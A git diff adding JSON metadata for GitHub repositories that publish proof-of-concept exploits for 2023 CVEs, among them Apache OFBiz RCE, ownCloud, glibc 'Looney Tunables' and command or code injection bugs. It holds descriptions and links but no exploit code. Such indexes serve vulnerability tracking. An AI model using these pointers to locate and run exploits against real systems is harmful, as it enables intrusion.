newline at end of file diff --git a/2023/CVE-2023-49003.json b/2023/CVE-2023-49003.json new file mode 100644 index 0000000000..b38274f764 --- /dev/null +++ b/2023/CVE-2023-49003.json @@ -0,0 +1,35 @@ +[ + { + "id": 720827247, + "name": "com.simplemobiletools.dialer", + "full_name": "actuator\/com.simplemobiletools.dialer", + "owner": { + "login": "actuator", + "id": 78701239, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78701239?v=4", + "html_url": "https:\/\/github.com\/actuator", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/actuator\/com.simplemobiletools.dialer", + "description": "CVE-2023-49003", + "fork": false, + "created_at": "2023-11-19T18:08:23Z", + "updated_at": "2024-01-17T19:58:22Z", + "pushed_at": "2023-11-19T18:20:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-49003" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49038.json b/2023/CVE-2023-49038.json new file mode 100644 index 0000000000..4a2074cfb8 --- /dev/null +++ b/2023/CVE-2023-49038.json @@ -0,0 +1,33 @@ +[ + { + "id": 731396286, + "name": "CVE-2023-49038", + "full_name": "christopher-pace\/CVE-2023-49038", + "owner": { + "login": "christopher-pace", + "id": 22531478, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22531478?v=4", + "html_url": "https:\/\/github.com\/christopher-pace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/christopher-pace\/CVE-2023-49038", + "description": "Command Injection in Ping Utility on Buffalo LS210D Version 1.78-0.03", + "fork": false, + "created_at": "2023-12-14T01:49:52Z", + "updated_at": "2024-01-07T03:38:02Z", + "pushed_at": "2024-01-07T03:37:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49052.json b/2023/CVE-2023-49052.json new file mode 100644 index 0000000000..841b9c2c55 --- /dev/null +++ b/2023/CVE-2023-49052.json @@ -0,0 +1,33 @@ +[ + { + "id": 724166656, + "name": "CVE-2023-49052", + "full_name": "Cyber-Wo0dy\/CVE-2023-49052", + "owner": { + "login": "Cyber-Wo0dy", + "id": 148460873, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/148460873?v=4", + "html_url": "https:\/\/github.com\/Cyber-Wo0dy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cyber-Wo0dy\/CVE-2023-49052", + "description": "Microweber version 2.0.4 vulnerable to \"Uploading Malicious Files\" ", + "fork": false, + "created_at": "2023-11-27T14:29:32Z", + "updated_at": "2023-11-27T14:33:10Z", + "pushed_at": "2023-11-27T17:20:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49070.json b/2023/CVE-2023-49070.json new file mode 100644 index 0000000000..465a6aa408 --- /dev/null +++ b/2023/CVE-2023-49070.json @@ -0,0 +1,199 @@ +[ + { + "id": 731528272, + "name": "ofbiz-CVE-2023-49070-RCE-POC", + "full_name": "abdoghazy2015\/ofbiz-CVE-2023-49070-RCE-POC", + "owner": { + "login": "abdoghazy2015", + "id": 64314534, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64314534?v=4", + "html_url": "https:\/\/github.com\/abdoghazy2015", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/abdoghazy2015\/ofbiz-CVE-2023-49070-RCE-POC", + "description": null, + "fork": false, + "created_at": "2023-12-14T09:32:41Z", + "updated_at": "2024-10-03T05:17:52Z", + "pushed_at": "2023-12-15T06:29:09Z", + "stargazers_count": 59, + "watchers_count": 59, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 59, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 732816678, + "name": "CVE-2023-49070", + "full_name": "0xrobiul\/CVE-2023-49070", + "owner": { + "login": "0xrobiul", + "id": 100078094, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100078094?v=4", + "html_url": "https:\/\/github.com\/0xrobiul", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xrobiul\/CVE-2023-49070", + "description": "Exploit Of Pre-auth RCE in Apache Ofbiz!!", + "fork": false, + "created_at": "2023-12-17T22:56:10Z", + "updated_at": "2023-12-18T17:44:46Z", + "pushed_at": "2023-12-26T19:51:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-ofbiz", + "cve", + "cve-2023-49070", + "ofbiz", + "pre-auth", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738951607, + "name": "OFBiz-Attack", + "full_name": "D0g3-8Bit\/OFBiz-Attack", + "owner": { + "login": "D0g3-8Bit", + "id": 150698913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/150698913?v=4", + "html_url": "https:\/\/github.com\/D0g3-8Bit", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D0g3-8Bit\/OFBiz-Attack", + "description": "A Tool For CVE-2023-49070\/CVE-2023-51467 Attack", + "fork": false, + "created_at": "2024-01-04T12:31:49Z", + "updated_at": "2024-10-18T15:39:14Z", + "pushed_at": "2024-03-12T11:06:55Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-ofbiz", + "cve-2023-49070", + "cve-2023-51467" + ], + "visibility": "public", + "forks": 1, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 740289485, + "name": "Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz", + "full_name": "UserConnecting\/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz", + "owner": { + "login": "UserConnecting", + "id": 97047842, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97047842?v=4", + "html_url": "https:\/\/github.com\/UserConnecting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/UserConnecting\/Exploit-CVE-2023-49070-and-CVE-2023-51467-Apache-OFBiz", + "description": "Authentication Bypass Vulnerability Apache OFBiz < 18.12.10.", + "fork": false, + "created_at": "2024-01-08T03:13:43Z", + "updated_at": "2024-04-13T04:19:46Z", + "pushed_at": "2024-01-08T07:03:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742169705, + "name": "CVE-2023-49070_CVE-2023-51467", + "full_name": "yukselberkay\/CVE-2023-49070_CVE-2023-51467", + "owner": { + "login": "yukselberkay", + "id": 22750024, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22750024?v=4", + "html_url": "https:\/\/github.com\/yukselberkay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yukselberkay\/CVE-2023-49070_CVE-2023-51467", + "description": "CVE-2023-49070 exploit and CVE-2023-49070 & CVE-2023-51467 vulnerability scanner", + "fork": false, + "created_at": "2024-01-11T22:35:57Z", + "updated_at": "2024-04-29T11:54:01Z", + "pushed_at": "2024-01-12T10:37:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744384595, + "name": "Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467", + "full_name": "Praison001\/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467", + "owner": { + "login": "Praison001", + "id": 60835238, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60835238?v=4", + "html_url": "https:\/\/github.com\/Praison001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Praison001\/Apache-OFBiz-Auth-Bypass-and-RCE-Exploit-CVE-2023-49070-CVE-2023-51467", + "description": "This exploit scans whether the provided target is vulnerable to CVE-2023-49070\/CVE-2023-51467 and also exploits it depending on the choice of the user.", + "fork": false, + "created_at": "2024-01-17T07:31:26Z", + "updated_at": "2024-01-17T07:45:27Z", + "pushed_at": "2024-01-25T08:21:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49103.json b/2023/CVE-2023-49103.json new file mode 100644 index 0000000000..11800b2ef1 --- /dev/null +++ b/2023/CVE-2023-49103.json @@ -0,0 +1,95 @@ +[ + { + "id": 722207170, + "name": "CVE-2023-49103", + "full_name": "creacitysec\/CVE-2023-49103", + "owner": { + "login": "creacitysec", + "id": 151768625, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/151768625?v=4", + "html_url": "https:\/\/github.com\/creacitysec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/creacitysec\/CVE-2023-49103", + "description": "PoC for the CVE-2023-49103", + "fork": false, + "created_at": "2023-11-22T17:00:23Z", + "updated_at": "2024-10-03T05:17:51Z", + "pushed_at": "2023-12-02T01:09:04Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 31, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 733384203, + "name": "OwnCloud-CVE-2023-49103", + "full_name": "merlin-ke\/OwnCloud-CVE-2023-49103", + "owner": { + "login": "merlin-ke", + "id": 55712262, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55712262?v=4", + "html_url": "https:\/\/github.com\/merlin-ke", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/merlin-ke\/OwnCloud-CVE-2023-49103", + "description": "OwnCloud CVE-2023-49103", + "fork": false, + "created_at": "2023-12-19T07:56:18Z", + "updated_at": "2023-12-19T08:10:42Z", + "pushed_at": "2023-12-19T08:10:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 820945344, + "name": "CVE-2023-49103", + "full_name": "d0rb\/CVE-2023-49103", + "owner": { + "login": "d0rb", + "id": 10403781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10403781?v=4", + "html_url": "https:\/\/github.com\/d0rb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d0rb\/CVE-2023-49103", + "description": "This is a simple proof of concept for CVE-2023-49103.", + "fork": false, + "created_at": "2024-06-27T13:46:46Z", + "updated_at": "2024-06-27T13:49:50Z", + "pushed_at": "2024-06-27T13:49:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49105.json b/2023/CVE-2023-49105.json new file mode 100644 index 0000000000..c3f682157a --- /dev/null +++ b/2023/CVE-2023-49105.json @@ -0,0 +1,33 @@ +[ + { + "id": 727692725, + "name": "owncloud-exploits", + "full_name": "ambionics\/owncloud-exploits", + "owner": { + "login": "ambionics", + "id": 29630660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29630660?v=4", + "html_url": "https:\/\/github.com\/ambionics", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ambionics\/owncloud-exploits", + "description": "ownCloud exploits for CVE-2023-49105", + "fork": false, + "created_at": "2023-12-05T11:35:12Z", + "updated_at": "2024-10-29T06:24:51Z", + "pushed_at": "2023-12-05T11:35:19Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 34, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-4911.json b/2023/CVE-2023-4911.json new file mode 100644 index 0000000000..17ef7f1101 --- /dev/null +++ b/2023/CVE-2023-4911.json @@ -0,0 +1,502 @@ +[ + { + "id": 700333818, + "name": "CVE-2023-4911", + "full_name": "Green-Avocado\/CVE-2023-4911", + "owner": { + "login": "Green-Avocado", + "id": 58372700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58372700?v=4", + "html_url": "https:\/\/github.com\/Green-Avocado", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Green-Avocado\/CVE-2023-4911", + "description": "https:\/\/www.qualys.com\/2023\/10\/03\/cve-2023-4911\/looney-tunables-local-privilege-escalation-glibc-ld-so.txt", + "fork": false, + "created_at": "2023-10-04T11:58:58Z", + "updated_at": "2023-10-10T12:53:31Z", + "pushed_at": "2023-10-05T20:48:46Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 700394746, + "name": "CVE-2023-4911", + "full_name": "leesh3288\/CVE-2023-4911", + "owner": { + "login": "leesh3288", + "id": 17825906, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17825906?v=4", + "html_url": "https:\/\/github.com\/leesh3288", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/leesh3288\/CVE-2023-4911", + "description": "PoC for CVE-2023-4911", + "fork": false, + "created_at": "2023-10-04T14:12:16Z", + "updated_at": "2024-10-28T23:01:13Z", + "pushed_at": "2023-10-04T14:16:36Z", + "stargazers_count": 379, + "watchers_count": 379, + "has_discussions": false, + "forks_count": 58, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 58, + "watchers": 379, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 700404689, + "name": "CVE-2023-4911", + "full_name": "RickdeJager\/CVE-2023-4911", + "owner": { + "login": "RickdeJager", + "id": 29239050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29239050?v=4", + "html_url": "https:\/\/github.com\/RickdeJager", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RickdeJager\/CVE-2023-4911", + "description": "CVE-2023-4911 proof of concept", + "fork": false, + "created_at": "2023-10-04T14:32:49Z", + "updated_at": "2024-10-24T14:07:15Z", + "pushed_at": "2023-10-08T23:24:24Z", + "stargazers_count": 163, + "watchers_count": 163, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 163, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 701947383, + "name": "CVE-2023-4911", + "full_name": "xiaoQ1z\/CVE-2023-4911", + "owner": { + "login": "xiaoQ1z", + "id": 20059156, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20059156?v=4", + "html_url": "https:\/\/github.com\/xiaoQ1z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xiaoQ1z\/CVE-2023-4911", + "description": null, + "fork": false, + "created_at": "2023-10-08T03:26:24Z", + "updated_at": "2023-10-08T03:30:00Z", + "pushed_at": "2023-10-08T03:28:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 703037275, + "name": "looney-tuneables", + "full_name": "silent6trinity\/looney-tuneables", + "owner": { + "login": "silent6trinity", + "id": 78173918, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78173918?v=4", + "html_url": "https:\/\/github.com\/silent6trinity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/silent6trinity\/looney-tuneables", + "description": "CVE-2023-4911", + "fork": false, + "created_at": "2023-10-10T13:29:11Z", + "updated_at": "2023-10-10T13:30:33Z", + "pushed_at": "2023-10-10T13:32:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 703246649, + "name": "looney-tunables-CVE-2023-4911", + "full_name": "hadrian3689\/looney-tunables-CVE-2023-4911", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/looney-tunables-CVE-2023-4911", + "description": null, + "fork": false, + "created_at": "2023-10-10T22:04:23Z", + "updated_at": "2024-11-27T10:09:03Z", + "pushed_at": "2023-10-15T19:37:06Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 25, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 703602936, + "name": "CVE-2023-4911", + "full_name": "ruycr4ft\/CVE-2023-4911", + "owner": { + "login": "ruycr4ft", + "id": 103446004, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103446004?v=4", + "html_url": "https:\/\/github.com\/ruycr4ft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ruycr4ft\/CVE-2023-4911", + "description": "CVE-2023-4911", + "fork": false, + "created_at": "2023-10-11T14:49:22Z", + "updated_at": "2024-11-21T15:38:04Z", + "pushed_at": "2023-10-11T15:15:18Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-4911", + "linux-privilege-escalation", + "poc" + ], + "visibility": "public", + "forks": 3, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 704757696, + "name": "CVE-2023-4911", + "full_name": "guffre\/CVE-2023-4911", + "owner": { + "login": "guffre", + "id": 21281361, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21281361?v=4", + "html_url": "https:\/\/github.com\/guffre", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guffre\/CVE-2023-4911", + "description": "PoC for CVE-2023-4911 LooneyTuneables", + "fork": false, + "created_at": "2023-10-14T02:24:52Z", + "updated_at": "2023-10-14T02:25:44Z", + "pushed_at": "2023-12-09T22:49:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 706044499, + "name": "LooneyPwner", + "full_name": "chaudharyarjun\/LooneyPwner", + "owner": { + "login": "chaudharyarjun", + "id": 66072013, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66072013?v=4", + "html_url": "https:\/\/github.com\/chaudharyarjun", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chaudharyarjun\/LooneyPwner", + "description": "Exploit tool for CVE-2023-4911, targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.", + "fork": false, + "created_at": "2023-10-17T07:44:16Z", + "updated_at": "2024-11-02T12:18:42Z", + "pushed_at": "2023-10-18T04:59:50Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 38, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 709787729, + "name": "CVE-2023-4911", + "full_name": "KernelKrise\/CVE-2023-4911", + "owner": { + "login": "KernelKrise", + "id": 76210733, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76210733?v=4", + "html_url": "https:\/\/github.com\/KernelKrise", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KernelKrise\/CVE-2023-4911", + "description": "Looney Tunables Local privilege escalation (CVE-2023-4911) workshop", + "fork": false, + "created_at": "2023-10-25T11:59:34Z", + "updated_at": "2024-10-28T23:06:00Z", + "pushed_at": "2024-10-01T08:39:14Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711297984, + "name": "CVE-2023-4911", + "full_name": "Diego-AltF4\/CVE-2023-4911", + "owner": { + "login": "Diego-AltF4", + "id": 55554183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55554183?v=4", + "html_url": "https:\/\/github.com\/Diego-AltF4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Diego-AltF4\/CVE-2023-4911", + "description": "Proof of concept for CVE-2023-4911 (Looney Tunables) discovered by Qualys Threat Research Unit ", + "fork": false, + "created_at": "2023-10-28T20:05:30Z", + "updated_at": "2024-11-03T18:00:44Z", + "pushed_at": "2024-11-03T18:00:40Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716007417, + "name": "looneyCVE", + "full_name": "teraGL\/looneyCVE", + "owner": { + "login": "teraGL", + "id": 35891879, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35891879?v=4", + "html_url": "https:\/\/github.com\/teraGL", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/teraGL\/looneyCVE", + "description": "Looney Tunables CVE-2023-4911", + "fork": false, + "created_at": "2023-11-08T09:34:04Z", + "updated_at": "2023-11-13T08:09:54Z", + "pushed_at": "2023-11-13T14:59:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 729907332, + "name": "Looney-Tunables", + "full_name": "snurkeburk\/Looney-Tunables", + "owner": { + "login": "snurkeburk", + "id": 70603096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70603096?v=4", + "html_url": "https:\/\/github.com\/snurkeburk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/snurkeburk\/Looney-Tunables", + "description": "PoC of CVE-2023-4911", + "fork": false, + "created_at": "2023-12-10T18:05:27Z", + "updated_at": "2023-12-10T18:14:12Z", + "pushed_at": "2023-12-10T19:28:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 735025193, + "name": "CVE-2023-4911", + "full_name": "puckiestyle\/CVE-2023-4911", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2023-4911", + "description": null, + "fork": false, + "created_at": "2023-12-23T11:54:40Z", + "updated_at": "2023-12-23T11:54:52Z", + "pushed_at": "2023-12-23T11:54:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745620836, + "name": "Looney-Tunables-CVE-2023-4911", + "full_name": "yanfernandess\/Looney-Tunables-CVE-2023-4911", + "owner": { + "login": "yanfernandess", + "id": 100174458, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100174458?v=4", + "html_url": "https:\/\/github.com\/yanfernandess", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yanfernandess\/Looney-Tunables-CVE-2023-4911", + "description": null, + "fork": false, + "created_at": "2024-01-19T18:20:05Z", + "updated_at": "2024-01-22T19:50:29Z", + "pushed_at": "2024-01-19T18:44:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745988276, + "name": "CVE-2023-4911-PoC", + "full_name": "NishanthAnand21\/CVE-2023-4911-PoC", + "owner": { + "login": "NishanthAnand21", + "id": 87749392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87749392?v=4", + "html_url": "https:\/\/github.com\/NishanthAnand21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NishanthAnand21\/CVE-2023-4911-PoC", + "description": "Repository containing a Proof of Concept (PoC) demonstrating the impact of CVE-2023-4911, a vulnerability in glibc's ld.so dynamic loader, exposing risks related to Looney Tunables. ", + "fork": false, + "created_at": "2024-01-20T18:47:07Z", + "updated_at": "2024-11-13T07:24:42Z", + "pushed_at": "2024-11-13T07:24:38Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49313.json b/2023/CVE-2023-49313.json new file mode 100644 index 0000000000..b219f7637f --- /dev/null +++ b/2023/CVE-2023-49313.json @@ -0,0 +1,33 @@ +[ + { + "id": 724369843, + "name": "CVE-2023-49313", + "full_name": "louiselalanne\/CVE-2023-49313", + "owner": { + "login": "louiselalanne", + "id": 100588945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4", + "html_url": "https:\/\/github.com\/louiselalanne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2023-49313", + "description": "A dylib injection vulnerability in XMachOViewer 0.04 allows attackers to compromise integrity. By exploiting this, unauthorized code can be injected into the product's processes, potentially leading to remote control and unauthorized access to sensitive user data.", + "fork": false, + "created_at": "2023-11-27T23:59:35Z", + "updated_at": "2023-12-07T01:21:35Z", + "pushed_at": "2023-11-28T12:59:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49314.json b/2023/CVE-2023-49314.json new file mode 100644 index 0000000000..fce26d558f --- /dev/null +++ b/2023/CVE-2023-49314.json @@ -0,0 +1,33 @@ +[ + { + "id": 724563642, + "name": "CVE-2023-49314", + "full_name": "louiselalanne\/CVE-2023-49314", + "owner": { + "login": "louiselalanne", + "id": 100588945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100588945?v=4", + "html_url": "https:\/\/github.com\/louiselalanne", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/louiselalanne\/CVE-2023-49314", + "description": "Asana Desktop 2.1.0 on macOS allows code injection because of specific Electron Fuses. There is inadequate protection against code injection through settings such as RunAsNode and enableNodeCliInspectArguments, and thus r3ggi\/electroniz3r can be used to perform an attack.", + "fork": false, + "created_at": "2023-11-28T10:39:19Z", + "updated_at": "2024-05-06T04:13:03Z", + "pushed_at": "2023-11-28T11:48:48Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-49339.json b/2023/CVE-2023-49339.json new file 